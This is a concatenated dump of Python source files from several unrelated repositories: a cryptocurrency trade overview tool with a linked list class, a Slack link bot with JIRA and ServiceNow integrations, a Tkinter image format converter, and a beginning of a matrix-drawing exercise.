print('\nInvalid choice, please try again')
# Entering the report mode
elif args['report']:
# declaring the graph object
graph = DSAGraph()
# declaring the assets object
assets = AssetObject()
asset_file = open('asset_info.csv')
# Reading the csv
asset_data = csv.reader(asset_file)
# reading the file and converting to json
tradeFile = open(args['report'][1])
exchangeFile = open(args['report'][0])
trade_data = json.load(tradeFile)
exchange_data = json.load(exchangeFile)
loadAssetData()
loadTradeData()
print("\nAsset Overview")
assets.getAssetOverview()
print("\nTrade Overview")
graph.getTradeOverview()
# Showing the usage information
else:
ap.print_help(sys.stderr)
sys.exit(1)
```
#### File: jobymathew/Cryptocurrency_Trade_Details_and_Overview/LinkedList.py
```python
import numpy as np
#Linked List Node Class
class DSAListNode():
"""
* Default Constructor.
* IMPORT: inValue (Object).
* EXPORT: none.
    * ASSERTION: value initialized as inValue, next and prev set as none.
"""
def __init__(self,inValue):
self.value = inValue
self.next = None
self.prev = None
"""
* METHOD: getValue.
* IMPORT: none.
* EXPORT: value (Object).
* ASSERTION: none.
"""
def getValue(self):
return self.value
"""
* METHOD: setValue.
* IMPORT: inValue (Object).
* EXPORT: value.
* ASSERTION: none.
"""
def setValue(self,inValue):
self.value = inValue
"""
* METHOD: getNext.
* IMPORT: none.
* EXPORT: next (DSAListNode).
* ASSERTION: none.
"""
def getNext(self):
return self.next
"""
* METHOD: getPrev.
* IMPORT: none.
* EXPORT: prev (DSAListNode).
* ASSERTION: none.
"""
def getPrev(self):
return self.prev
"""
* METHOD: setNext.
* IMPORT: newNext (DSAListNode).
* EXPORT: none.
* ASSERTION: none.
"""
def setNext(self,newNext):
self.next = newNext
"""
* METHOD: setPrev.
* IMPORT: newPrev (DSAListNode).
* EXPORT: none.
* ASSERTION: none.
"""
def setPrev(self,newPrev):
self.prev = newPrev
#Linked List implementation class
class DSALinkedList():
head = DSAListNode(None)
tail = DSAListNode(None)
"""
* Default Constructor.
* IMPORT: none.
* EXPORT: none.
    * ASSERTION: head and tail initialized as none.
"""
def __init__(self):
self.head = None
self.tail = None
"""
* METHOD: isEmpty.
* IMPORT: none.
* EXPORT: none.
* USAGE: check if the list is empty.
"""
def isEmpty(self):
return self.head == None
"""
* METHOD: insertFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Inserting into the top of the list.
"""
def insertFirst(self,newValue):
newNd = DSAListNode(newValue)
if self.isEmpty():
self.head = newNd
self.head.setNext(None)
self.head.setPrev(None)
self.tail = newNd
self.tail.setPrev(None)
self.tail.setNext(None)
else:
newNd.setNext(self.head)
self.head.setPrev(newNd)
self.head = newNd
"""
* METHOD: insertLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Inserting into the bottom of the list.
"""
def insertLast(self, newValue):
newNd = DSAListNode(newValue)
if self.isEmpty():
self.head = newNd
self.tail = newNd
else:
self.tail.setNext(newNd)
newNd.setPrev(self.tail)
self.tail = newNd
"""
* METHOD: peekFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Returns the first element of the list.
"""
def peekFirst(self):
retVal = None
if not self.isEmpty():
retVal = self.head.getValue()
return retVal
"""
* METHOD: peekLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Returns the last element of the list.
"""
def peekLast(self):
retVal = None
if not self.isEmpty():
retVal = self.tail.getValue()
return retVal
"""
* METHOD: removeFirst.
* IMPORT: none.
* EXPORT: none.
* USAGE: Removes the first element of the list.
"""
def removeFirst(self):
if not self.isEmpty():
            if self.head.getNext() == None:
                rmNd = self.head.getValue()
                # Only node removed, so clear both ends of the list
                self.head = None
                self.tail = None
else:
rmNd = self.head.getValue()
self.head = self.head.getNext()
self.head.setPrev(None)
"""
* METHOD: removeLast.
* IMPORT: none.
* EXPORT: none.
* USAGE: Removes the last element of the list.
"""
def removeLast(self):
if not self.isEmpty():
rmNd = self.tail.getValue()
            self.tail = self.tail.getPrev()
            if self.tail is None:
                # Removed the only node, so the list is now empty
                self.head = None
            else:
                self.tail.setNext(None)
"""
* METHOD: remove.
* IMPORT: inValue (Object).
* EXPORT: none.
* USAGE: Removes the given element from the list.
"""
def remove(self, inValue):
if not self.isEmpty():
if self.head.getValue() == inValue:
self.head = self.head.getNext()
rmNd = self.head
while(rmNd.getNext() != None and rmNd.getValue() != inValue):
prevNd = rmNd
rmNd = rmNd.getNext()
if rmNd.getValue() == inValue:
prevNd.setNext(prevNd.getNext().getNext())
if prevNd.getNext() != None:
prevNd.getNext().setPrev(prevNd)
"""
* METHOD: iter.
* IMPORT: none.
* EXPORT: none.
* USAGE: iteration.
"""
def __iter__(self):
self.cur = self.head
return self
"""
* METHOD: next.
* IMPORT: none.
* EXPORT: none.
* USAGE: returns next value of iteration.
"""
def __next__(self):
        if self.cur is None:
            raise StopIteration
        currNd = self.cur.getValue()
        self.cur = self.cur.getNext()
        return currNd
"""
* METHOD: display.
* IMPORT: none.
* EXPORT: none.
* USAGE: displaying the values in the list.
"""
def display(self):
currNd = self.head
while(currNd != None):
print(currNd.getValue(), end=' ')
currNd = currNd.getNext()
print()
"""
* METHOD: listOfValues.
* IMPORT: none.
* EXPORT: none.
* USAGE: returns the values in the list as an array.
"""
def listOfValues(self):
size = self.count()
rtnList = np.empty(size, dtype=object)
currNd, i = self.head, 0
if not (self.isEmpty()):
while(currNd != None):
rtnList[i] = currNd.getValue()
i += 1
currNd = currNd.getNext()
return rtnList
"""
* METHOD: hasNode.
* IMPORT: value (Object).
* EXPORT: none.
* USAGE: check if the element exists in the list.
"""
def hasNode(self, value):
isFound = False
currNd = self.head
if not(self.isEmpty()):
while(currNd != None):
if currNd.getValue() == value:
isFound = True
currNd = currNd.getNext()
return isFound
"""
* METHOD: find.
* IMPORT: value (Object).
* EXPORT: none.
* USAGE: find an element in the list.
"""
def find(self, value):
        returnValue = None
        if not(self.isEmpty()):
            currNd = self.head
            while(currNd != None):
                if currNd.getValue() == value:
                    returnValue = currNd.getValue()
                currNd = currNd.getNext()
        return returnValue
"""
* METHOD: count.
* IMPORT: none.
* EXPORT: none.
* USAGE: count of elements in the list.
"""
def count(self):
c = 0
currNd = self.head
if not(self.isEmpty()):
while(currNd != None):
c += 1
currNd = currNd.getNext()
return c
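# Hypothetical usage sketch (not part of the original classes).
# The trade symbols inserted below are illustrative only.
def _exampleUsage():
    trades = DSALinkedList()
    trades.insertLast('BTCUSDT')
    trades.insertLast('ETHBTC')
    trades.insertFirst('BNBBTC')
    assert trades.peekFirst() == 'BNBBTC'
    assert trades.hasNode('ETHBTC')
    assert trades.count() == 3
    trades.remove('ETHBTC')
    return trades.listOfValues()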
``` |
{
"source": "jobywalker/linkbot",
"score": 3
} |
#### File: jobywalker/linkbot/app.py
```python
import logconfig # noqa F401
from flask import Flask, request, jsonify, abort
import slack
import os
import time
import hmac
import hashlib
from functools import partial
from threading import Thread
from queue import Queue
from linkbot import bots, RequestLogger
app = Flask(__name__)
app.config.from_pyfile(os.environ['APP_CONFIG'])
SLACK_SECRET = app.config['SLACK_SIGNING_SECRET']
LINKBOTS = []
for bot in app.config['LINKBOTS']:
LINKBOTS.append(getattr(bots, bot.get('LINK_CLASS', 'LinkBot'))(bot))
if not LINKBOTS:
raise Exception('no linkbots defined')
SLACK_CLIENT = slack.WebClient(app.config['SLACK_BOT_TOKEN'])
WEBHOOK_CLIENT = RequestLogger()
@app.route('/', methods=['GET', 'POST'])
def handle_message():
"""A single endpoint handling both events and commands."""
if request.method == 'GET':
return jsonify(success=True) # to pass a health check
verify_slack_signature()
if not request.is_json:
MessageProcessor.queue.put(partial(process_command, request.form))
return jsonify(response_type='in_channel')
json = request.get_json()
if 'challenge' in json:
# This is how Slack verifies our URL to receive events.
return jsonify(challenge=json['challenge'])
event = json['event']
MessageProcessor.queue.put(partial(process_event, event))
return '', 200
def verify_slack_signature():
"""
Verify a slack signature according to
https://api.slack.com/docs/verifying-requests-from-slack
"""
if app.debug:
return
timestamp = request.headers['X-Slack-Request-Timestamp']
signature = request.headers['X-Slack-Signature']
if time.time() - int(timestamp) > 5 * 60:
app.logger.error('Stale command request.')
abort(403)
compstr = f'v0:{timestamp}:'.encode() + request.get_data()
rhash = hmac.new(SLACK_SECRET.encode(), compstr, hashlib.sha256)
rhash = rhash.hexdigest()
if not hmac.compare_digest(f'v0={rhash}', signature):
app.logger.error('Invalid X-Slack-Signature')
abort(403)
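# --- Hypothetical test sketch (not part of the original module) ---
# Shows how a test client could build headers that verify_slack_signature()
# would accept, per https://api.slack.com/docs/verifying-requests-from-slack.
# The body and secret are supplied by the caller.
def _example_signature_headers(body: bytes, secret: str):
    timestamp = str(int(time.time()))
    basestring = f'v0:{timestamp}:'.encode() + body
    digest = hmac.new(secret.encode(), basestring, hashlib.sha256).hexdigest()
    return {
        'X-Slack-Request-Timestamp': timestamp,
        'X-Slack-Signature': f'v0={digest}',
    }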
class MessageProcessor(Thread):
queue = Queue()
def run(self):
"""Pull messages off the queue and process them."""
while True:
func = self.queue.get()
try:
func()
except Exception as e:
app.logger.exception(e)
self.queue.task_done()
def process_event(event):
"""Process events by posting matches to the provided channel."""
event_type = event.get('type')
subtype = event.get('subtype')
hidden = event.get('hidden')
if event_type != 'message':
app.logger.error(f'discarding unhandled event type {event_type}')
return
if 'bot_id' in event or subtype == 'bot_message':
return
event_keys = ','.join(event)
description = f'subtype={subtype};hidden={hidden}, {event_keys}'
if hidden or 'text' not in event or 'channel' not in event:
app.logger.info(f'Event discarded: {description}')
return
text = event['text']
post_args = {'channel': event['channel']}
if 'thread_ts' in event:
post_args['thread_ts'] = event['thread_ts']
app.logger.debug(f'processing message from event: {description}')
for message in links_from_text(text):
SLACK_CLIENT.chat_postMessage(text=message, **post_args)
def process_command(command):
"""Process a slack command by posting a response to the provided url."""
response_url = command.get('response_url')
text = command.get('text')
if not all([text, response_url]):
command_keys = ','.join(command)
app.logger.error(f'tossing supposed command: {command_keys}')
return
text = '\n'.join(links_from_text(text))
if text:
data = dict(text=text, response_type='in_channel')
WEBHOOK_CLIENT.post(response_url, json=data)
def links_from_text(text):
"""Search for matches and post any to the original channel."""
for bot in LINKBOTS:
for match in bot.match(text):
app.logger.info(f'{match} match!')
try:
yield bot.message(match)
except KeyError as e:
app.logger.info(f'not found on {match}: {e}')
except Exception as e:
app.logger.error(e)
continue
for _ in range(4):
MessageProcessor().start()
```
#### File: linkbot/linkbot/bots.py
```python
import re
import random
from . import clients
from datetime import datetime
class LinkBot(object):
"""Implements Slack message matching and link response
"""
QUIPS = [
'%s',
'linkbot noticed a link! %s',
'Oh, here it is... %s',
'Maybe this, %s, will help?',
'Click me! %s',
'Click my shiny metal link! %s',
'Here, let me link that for you... %s',
'Couldn\'t help but notice %s was mentioned...',
'Not that I was eavesdropping, but did you mention %s?',
'hmmmm, did you mean %s?',
'%s... Mama said there\'d be days like this...',
'%s? An epic, yet approachable tale...',
'%s? Reminds me of a story...',
]
default_match = r'_THIS_COULD_BE_OVERRIDDEN_'
def __init__(self, conf):
self._conf = conf
match = conf.get('MATCH', self.default_match)
self._regex = re.compile(r'(\A|\s)+(%s)' % match, flags=re.I)
if 'QUIPS' in conf:
self.QUIPS = conf.get('QUIPS')
self._link = conf.get('LINK', '%s|%s')
self._seen = []
def match(self, text):
"""Return a set of unique matches for text."""
return set(match[1] for match in self._regex.findall(text))
def message(self, link_label):
return self._message_text(self._link % (link_label, link_label))
def reset(self):
self._seen = []
def _quip(self, link):
if not self.QUIPS:
return link
quip = random.choice(self.QUIPS)
return quip % link
def _message_text(self, link):
return self._quip(link)
def _escape_html(self, text):
escaped = {
'&': '&',
'<': '<',
'>': '>',
}
return "".join(escaped.get(c, c) for c in text)
class JiraLinkBot(LinkBot):
"""Subclass LinkBot to customize response for JIRA links
"""
default_match = r'[A-Z]{3,}\-[0-9]+'
def __init__(self, conf):
if 'LINK' not in conf:
conf['LINK'] = '<{}/browse/%s|%s>'.format(conf['HOST'])
super(JiraLinkBot, self).__init__(conf)
self.jira = clients.UwSamlJira(host=conf.get('HOST'),
auth=conf.get('AUTH'))
@staticmethod
def pretty_update_time(issue):
updated = issue.fields.updated
try:
update_dt = datetime.strptime(updated, '%Y-%m-%dT%H:%M:%S.%f%z')
updated = update_dt.strftime("%Y-%m-%d %H:%M:%S")
except Exception:
pass
return updated
def message(self, link_label):
msg = super(JiraLinkBot, self).message(link_label)
issue = self.jira.issue(link_label)
summary = issue.fields.summary
def get_name(person): return person and person.displayName or 'None'
reporter = '*Reporter* ' + get_name(issue.fields.reporter)
assignee = '*Assignee* ' + get_name(issue.fields.assignee)
status = '*Status* ' + issue.fields.status.name
updated = '*Last Update* ' + self.pretty_update_time(issue)
lines = list(map(self._escape_html,
[summary, reporter, assignee, status, updated]))
return '\n> '.join([msg] + lines)
class ServiceNowBot(LinkBot):
_ticket_regex = '|'.join(clients.ServiceNowClient.table_map)
default_match = '(%s)[0-9]{7,}' % _ticket_regex
def __init__(self, conf):
super(ServiceNowBot, self).__init__(conf)
self.client = clients.ServiceNowClient(
host=conf.get('HOST'), auth=conf.get('AUTH'))
def message(self, link_label):
record = self.client.get_number(link_label)
link = self._strlink(link_label)
lines = [self._quip(link)]
for key, value in record.items(pretty_names=True):
if key == 'Subject':
lines.append(value or 'No subject')
elif key == 'Parent' and value:
link = self._strlink(value)
lines.append('*{key}* {link}'.format(key=key, link=link))
elif value and key != 'Number':
lines.append('*{key}* {value}'.format(key=key, value=value))
return '\n> '.join(lines)
def _strlink(self, link_label):
link = self.client.link(link_label)
return '<{link}|{label}>'.format(link=link, label=link_label)
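# --- Hypothetical usage sketch (not part of the original module) ---
# The match pattern, link template and quip below are illustrative only.
def _example_linkbot():
    bot = LinkBot({
        'MATCH': r'REQ[0-9]+',
        'LINK': '<https://tickets.example.com/%s|%s>',
        'QUIPS': ['%s'],
    })
    for match in bot.match('please have a look at REQ1234 and REQ5678'):
        print(bot.message(match))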
```
#### File: linkbot/linkbot/__init__.py
```python
import requests
import time
from logging import getLogger
logger = getLogger(__name__)
class RequestLogger(requests.Session):
default_timeout = 15
def request(self, method, url, *args, **kwargs):
start_time = time.time()
response = None
kwargs.setdefault('timeout', self.default_timeout)
try:
response = super().request(method, url, *args, **kwargs)
finally:
elapsed = time.time() - start_time
            status = response.status_code if response is not None else 'ERR'
logger.info(f'{method} {url} {status} {elapsed:0.3f}')
return response
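# --- Hypothetical usage sketch (not part of the original module) ---
# The URL below is illustrative only.
def _example_request():
    session = RequestLogger()
    # Behaves like a requests.Session: each call gets the 15s default timeout
    # and is logged as "METHOD url status elapsed".
    return session.get('https://example.com/healthz')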
``` |
{
"source": "JOC61/image-type-changer",
"score": 3
} |
#### File: image-type-changer/src/main.py
```python
import tkinter as tk, os
from PIL import Image
# Set image path to the current directory wherever you are
imageDirname = os.path.dirname(__file__)
imagePath = os.path.join(imageDirname, 'images to change/')
# Set asset path to the current directory wherever you are
assetDirname = os.path.dirname(__file__)
assetPath = os.path.join(assetDirname, 'assets/')
def change(endFormat, preserveAlpha):
f = []
for (dirpath, dirnames, filenames) in os.walk(imagePath):
f.extend(filenames)
j = 0
for x in filenames:
# Get rid of the last . and whatever is past it
file = filenames[j]
splitat = file.rfind('.') + 1
r = file[splitat:]
file = file[:-len(r)]
            # Open that image
im = Image.open(imagePath + filenames[j])
if preserveAlpha == True:
im.convert('RGBA').save(imagePath + file + endFormat.lower(), endFormat)
if preserveAlpha == False:
im.convert('RGB').save(imagePath + file + endFormat.lower(), endFormat)
j += 1
break
# Make the window and set window name
root = tk.Tk(className = 'image changer')
# Set background color
root.configure(bg ='#232323')
# Set window size
root.geometry('200x100')
# Make unable to be resized
root.resizable(False, False)
# Set icon
root.iconphoto(False, tk.PhotoImage(file = assetPath + 'icon.png'))
# Set the list of file types to transfer between
optionsList = [
'PNG',
'JPEG',
'ICO',
'WEBP',
'TIFF',
'BMP'
]
# Make StringVar() for the label of the dropdown
optionVariable = tk.StringVar()
optionVariable.set(optionsList[0])
# Make labels
lblTo = tk.Label(text = 'to', bg = '#232323', fg = '#E16D00')
# Make dropdown for all the different options
opt = tk.OptionMenu(root, optionVariable, *optionsList)
opt.config(bg = '#E16D00', fg = 'BLACK')
opt['highlightthickness']=0
opt['menu'].config(bg='#E16D00', fg = 'BLACK')
# Make buttons
#if optionVariable.get() == 'PNG' or optionVariable.get() == 'ICO' or optionVariable.get() == 'WEBP' or optionVariable.get() == 'TIFF' or optionVariable.get() == 'BMP':
btnConvert = tk.Button(text = 'Convert (preserve alpha)', bg = '#E16D00', fg = 'BLACK', command = lambda: change(optionVariable.get(), True))
btnConvertNoAlpha = tk.Button(text = "Convert (don't preserve alpha)", bg = '#E16D00', fg = 'BLACK', command = lambda: change(optionVariable.get(), False))
# Stick all the stuff in the window
lblTo.grid(row = 0, column = 0)
opt.grid(row = 0, column = 1)
btnConvert.grid(row = 1, column = 1)
btnConvertNoAlpha.grid(row = 2, column = 1)
# Run mainloop to actually have the window
root.mainloop()
``` |
{
"source": "jocado/networking-calico",
"score": 2
} |
#### File: agent/linux/dhcp.py
```python
import copy
import netaddr
import os
import re
import sys
import time
from neutron.agent.linux import dhcp
from oslo_log import log as logging
from networking_calico.compat import constants
LOG = logging.getLogger(__name__)
class DnsmasqRouted(dhcp.Dnsmasq):
"""Dnsmasq DHCP driver for routed virtual interfaces."""
def __init__(self, conf, network, process_monitor,
version=None, plugin=None):
super(DnsmasqRouted, self).__init__(conf, network, process_monitor,
version, plugin)
self.device_manager = CalicoDeviceManager(self.conf, plugin)
# Frozen copy of Dnsmasq::_build_cmdline_callback from
# neutron/agent/linux/dhcp.py in Neutron 13.0.2.
def neutron_13_0_2_build_cmdline_callback(self, pid_file):
# We ignore local resolv.conf if dns servers are specified
# or if local resolution is explicitly disabled.
_no_resolv = (
'--no-resolv' if self.conf.dnsmasq_dns_servers or
not self.conf.dnsmasq_local_resolv else '')
cmd = [
'dnsmasq',
'--no-hosts',
_no_resolv,
'--except-interface=lo',
'--pid-file=%s' % pid_file,
'--dhcp-hostsfile=%s' % self.get_conf_file_name('host'),
'--addn-hosts=%s' % self.get_conf_file_name('addn_hosts'),
'--dhcp-optsfile=%s' % self.get_conf_file_name('opts'),
'--dhcp-leasefile=%s' % self.get_conf_file_name('leases'),
'--dhcp-match=set:ipxe,175',
]
if self.device_manager.driver.bridged:
cmd += [
'--bind-interfaces',
'--interface=%s' % self.interface_name,
]
else:
cmd += [
'--bind-dynamic',
'--interface=%s' % self.interface_name,
'--interface=tap*',
'--bridge-interface=%s,tap*' % self.interface_name,
]
possible_leases = 0
for i, subnet in enumerate(self._get_all_subnets(self.network)):
mode = None
# if a subnet is specified to have dhcp disabled
if not subnet.enable_dhcp:
continue
if subnet.ip_version == 4:
mode = 'static'
else:
# Note(scollins) If the IPv6 attributes are not set, set it as
# static to preserve previous behavior
addr_mode = getattr(subnet, 'ipv6_address_mode', None)
ra_mode = getattr(subnet, 'ipv6_ra_mode', None)
if (addr_mode in [constants.DHCPV6_STATEFUL,
constants.DHCPV6_STATELESS] or
not addr_mode and not ra_mode):
mode = 'static'
cidr = netaddr.IPNetwork(subnet.cidr)
if self.conf.dhcp_lease_duration == -1:
lease = 'infinite'
else:
lease = '%ss' % self.conf.dhcp_lease_duration
# mode is optional and is not set - skip it
if mode:
if subnet.ip_version == 4:
cmd.append('--dhcp-range=%s%s,%s,%s,%s,%s' %
('set:', self._TAG_PREFIX % i,
cidr.network, mode, cidr.netmask, lease))
else:
if cidr.prefixlen < 64:
LOG.debug('Ignoring subnet %(subnet)s, CIDR has '
'prefix length < 64: %(cidr)s',
{'subnet': subnet.id, 'cidr': cidr})
continue
cmd.append('--dhcp-range=%s%s,%s,%s,%d,%s' %
('set:', self._TAG_PREFIX % i,
cidr.network, mode,
cidr.prefixlen, lease))
possible_leases += cidr.size
mtu = getattr(self.network, 'mtu', 0)
# Do not advertise unknown mtu
if mtu > 0:
cmd.append('--dhcp-option-force=option:mtu,%d' % mtu)
# Cap the limit because creating lots of subnets can inflate
# this possible lease cap.
cmd.append('--dhcp-lease-max=%d' %
min(possible_leases, self.conf.dnsmasq_lease_max))
try:
if self.conf.dhcp_renewal_time > 0:
cmd.append('--dhcp-option-force=option:T1,%ds' %
self.conf.dhcp_renewal_time)
except AttributeError:
pass
try:
if self.conf.dhcp_rebinding_time > 0:
cmd.append('--dhcp-option-force=option:T2,%ds' %
self.conf.dhcp_rebinding_time)
except AttributeError:
pass
cmd.append('--conf-file=%s' % self.conf.dnsmasq_config_file)
for server in self.conf.dnsmasq_dns_servers:
cmd.append('--server=%s' % server)
try:
if self.dns_domain:
cmd.append('--domain=%s' % self.dns_domain)
except AttributeError:
pass
if self.conf.dhcp_broadcast_reply:
cmd.append('--dhcp-broadcast')
if self.conf.dnsmasq_base_log_dir:
log_dir = os.path.join(
self.conf.dnsmasq_base_log_dir,
self.network.id)
try:
if not os.path.exists(log_dir):
os.makedirs(log_dir)
except OSError:
LOG.error('Error while create dnsmasq log dir: %s', log_dir)
else:
log_filename = os.path.join(log_dir, 'dhcp_dns_log')
cmd.append('--log-queries')
cmd.append('--log-dhcp')
cmd.append('--log-facility=%s' % log_filename)
return cmd
def _build_cmdline_callback(self, pid_file):
cmd = self.neutron_13_0_2_build_cmdline_callback(pid_file)
# Replace 'static' by 'static,off-link' in all IPv6
# --dhcp-range options.
prog = re.compile('(--dhcp-range=set:[^,]+,[0-9a-f:]+),static,(.*)')
for option in copy.copy(cmd):
m = prog.match(option)
if m:
cmd.remove(option)
cmd.append(m.group(1) + ',static,off-link,' + m.group(2))
# Add '--enable-ra'.
cmd.append('--enable-ra')
# Enumerate precisely the TAP interfaces to listen on.
cmd.remove('--interface=tap*')
cmd.remove('--bridge-interface=%s,tap*' % self.interface_name)
bridge_option = '--bridge-interface=%s' % self.interface_name
for port in self.network.ports:
if port.device_id.startswith('tap'):
LOG.debug('Listen on %s', port.device_id)
cmd.append('--interface=%s' % port.device_id)
bridge_option = bridge_option + ',' + port.device_id
cmd.append(bridge_option)
return cmd
def _destroy_namespace_and_port(self):
try:
self.device_manager.destroy(self.network, self.interface_name)
except RuntimeError:
LOG.warning('Failed trying to delete interface: %s',
self.interface_name)
class CalicoDeviceManager(dhcp.DeviceManager):
"""Device manager for the default namespace that Calico operates in."""
def _set_default_route(self, network, device_name):
pass
def _cleanup_stale_devices(self, network, dhcp_port):
pass
def fill_dhcp_udp_checksums(self, *args, **kwargs):
retries = 10
while retries > 0:
try:
super(CalicoDeviceManager, self).fill_dhcp_udp_checksums(
*args, **kwargs)
except RuntimeError:
# fill_dhcp_udp_checksums() can fail transiently if iptables
# is modified concurrently, especially with an aggressive
# iptables writer such as Felix running.
LOG.exception("Failed to insert checksum rule, may retry...")
time.sleep(0.1)
retries -= 1
else:
LOG.debug("Inserted DHCP checksum rule.")
break
else:
LOG.error("Failed to insert DHCP checksum rule. Exiting...")
sys.exit(1)
``` |
{
"source": "jocafneto/Insurance-All-Cross-Sell",
"score": 3
} |
#### File: jocafneto/Insurance-All-Cross-Sell/handler.py
```python
import os
import pickle
import pandas as pd
import lightgbm
from flask import Flask, request, Response
from healthinsurance.HealthInsurance import HealthInsurance
# loading model
model = pickle.load( open( 'model/LGBM_Model.pkl', 'rb' ) )
# initialize API
app = Flask( __name__ )
@app.route( '/predict', methods=['POST'] )
def healthinsurance_predict():
test_json = request.get_json()
if test_json: # there is data
        if isinstance( test_json, dict ): # single example
test_raw = pd.DataFrame( test_json, index=[0] )
        else: # multiple examples
test_raw = pd.DataFrame( test_json, columns=test_json[0].keys() )
# Instantiate HealthInsurance Class
pipeline = HealthInsurance()
# data cleaning
df = pipeline.data_cleaning( test_raw )
# feature engineering
df = pipeline.feature_engineering( df )
# data preparation
df = pipeline.data_preparation( df )
# prediction
df_response = pipeline.get_prediction( model, test_raw, df )
return df_response
else:
return Response( '{}', status=200, mimetype='application/json')
if __name__ == '__main__':
port = os.environ.get( 'PORT', 5000 )
app.run( '0.0.0.0', port=port )
``` |
{
"source": "jocamill/pos-distillery",
"score": 3
} |
#### File: jocamill/pos-distillery/pos_kbinput.py
```python
from pynput import keyboard
def on_press(key):
# attempt to catch the hand scanner input and stack the str
try:
#print('alphanumeric key {0} pressed'.format(key.char))
print('Scanning DL *********************************')
except AttributeError:
print('special key {0} pressed'.format(
key))
if key == keyboard.Key.enter:
print('The ENTER was pressed')
def on_release(key):
# print('{0}'.format(key))
# inputstr = "" + '{0}'.format(key)
if key == keyboard.Key.esc:
# Stop listener
print('Exiting by command')
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release) as listener:
listener.join()
def main():
    pass
``` |
{
"source": "jocampo/url-shortener-demo",
"score": 3
} |
#### File: db/dao/shortened_url_dao.py
```python
from abc import ABC
from db.dao.abstract_dao import AbstractDAO
from db.models.base_model import BaseModel
from app.create_app import db
from db.models.shortened_url import ShortenedUrl
class ShortenedUrlDAO(AbstractDAO):
"""
Shortened URL DAO that contains specific operations for this entity type in the db
"""
@staticmethod
def get_by_short_url(short_url: str) -> ShortenedUrl:
"""
Fetches the url record based on the provided shortened url.
:param short_url: shortened version of the URL to look for in the db
:return matching SQLAlchemy entity from the database
"""
assert short_url, short_url
        return (db.session
.query(ShortenedUrl)
.filter(ShortenedUrl.short_url == short_url)
.one())
@staticmethod
def get_by_long_url(long_url: str) -> ShortenedUrl:
"""
Fetches the url record based on the provided long/original url.
:param long_url: long version of the URL to look for in the db
:return matching SQLAlchemy entity from the database
"""
assert long_url, long_url
        return (db.session
.query(ShortenedUrl)
.filter(ShortenedUrl.long_url == long_url)
.one())
```
#### File: migrations/versions/a507aebc8a88_initial_schema.py
```python
from alembic import op
# revision identifiers, used by Alembic.
from sqlalchemy import Column, BigInteger, String, DateTime, func
revision = 'a507aebc8a88'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"url",
Column("id", BigInteger, primary_key=True),
Column("short_url", String, nullable=False),
Column("long_url", String, nullable=False),
Column("hits", BigInteger, nullable=False, default=0),
Column("created_at", DateTime(timezone=True), server_default=func.now()),
Column("updated_at", DateTime(timezone=True), onupdate=func.now()),
)
def downgrade():
op.drop_table("url")
``` |
{
"source": "Jocapear/computerVision",
"score": 3
} |
#### File: Jocapear/computerVision/test.py
```python
import numpy as np
import imutils
import cv2
bg = None
# --------------------------------------------------
# To find the running average over the background
# --------------------------------------------------
def run_avg(image, aWeight):
global bg
# initialize the background
if bg is None:
bg = image.copy().astype("float")
return
# compute weighted average, accumulate it and update the background
cv2.accumulateWeighted(image, bg, aWeight)
# ---------------------------------------------
# To segment the region of hand in the image
# ---------------------------------------------
def segment(image, threshold=25):
global bg
# find the absolute difference between background and current frame
diff = cv2.absdiff(bg.astype("uint8"), image)
# threshold the diff image so that we get the foreground
thresholded = cv2.threshold(
diff, threshold, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]
opening = cv2.morphologyEx(
thresholded, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3)))
# get the contours in the thresholded image
(cnts, _) = cv2.findContours(opening.copy(),
cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# return None, if no contours detected
if len(cnts) == 0:
return
else:
# based on contour area, get the maximum contour which is the hand
segmented = max(cnts, key=cv2.contourArea)
return (opening, segmented)
# -----------------
# MAIN FUNCTION
# -----------------
if __name__ == "__main__":
# initialize weight for running average
aWeight = 0.5
# get the reference to the webcam
camera = cv2.VideoCapture(0)
# region of interest (ROI) coordinates
top, right, bottom, left = 0, 0, 700, 700
#top, right, bottom, left = 10, 350, 225, 590
# initialize num of frames
num_frames = 0
# keep looping, until interrupted
while(True):
# get the current frame
(grabbed, frame) = camera.read()
# resize the frame
frame = imutils.resize(frame, width=700)
# flip the frame so that it is not the mirror view
frame = cv2.flip(frame, 1)
# clone the frame
clone = frame.copy()
# get the height and width of the frame
(height, width) = frame.shape[:2]
# get the ROI
roi = frame[top:bottom, right:left]
# convert the roi to grayscale and blur it
gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# to get the background, keep looking till a threshold is reached
# so that our running average model gets calibrated
if num_frames < 30:
run_avg(gray, aWeight)
else:
# segment the hand region
hand = segment(gray)
# check whether hand region is segmented
if hand is not None:
# if yes, unpack the thresholded image and
# segmented region
(thresholded, segmented) = hand
# Morphology operations
kernel = np.ones((7, 7), np.uint8)
thresholded = cv2.morphologyEx(
thresholded, cv2.MORPH_CLOSE, kernel)
# draw the segmented region and display the frame
cv2.drawContours(
clone, [segmented + (right, top)], -1, (0, 0, 255))
                cv2.imshow("Thresholded", thresholded)
# draw the segmented hand
cv2.putText(clone, str(num_frames), (0, 25),
cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
cv2.rectangle(clone, (left, top), (right, bottom), (0, 255, 0), 2)
# increment the number of frames
num_frames += 1
# display the frame with segmented hand
cv2.imshow("Video Feed", clone)
# observe the keypress by the user
keypress = cv2.waitKey(1) & 0xFF
# if the user pressed "q", then stop looping
if keypress == ord("q"):
break
# free up memory
camera.release()
cv2.destroyAllWindows()
``` |
{
"source": "jocardozo/Rooftop-Challenge",
"score": 4
} |
#### File: Rooftop-Challenge/codeChallenge/Exercise1.py
```python
def makeFigure(size):
    figure = [[0] *(size) for j in range(size)] # create the matrix of 0s with the requested size
x = 0
y = 0
figure[0][0] =1
    '''Helper functions for the snake traversal
    '''
def moverEste(figure,x,y,pasos):
for i in range(pasos):
y = y + 1
x = x
figure[x][y] =1
return(x,y)
def moverSur(figure,x,y,pasos):
for i in range(pasos):
x = x + 1
y = y
figure[x][y] =1
return(x,y)
def moverOeste(figure,x,y,pasos):
for i in range(pasos):
y = y - 1
x = x
figure[x][y] =1
return(x,y)
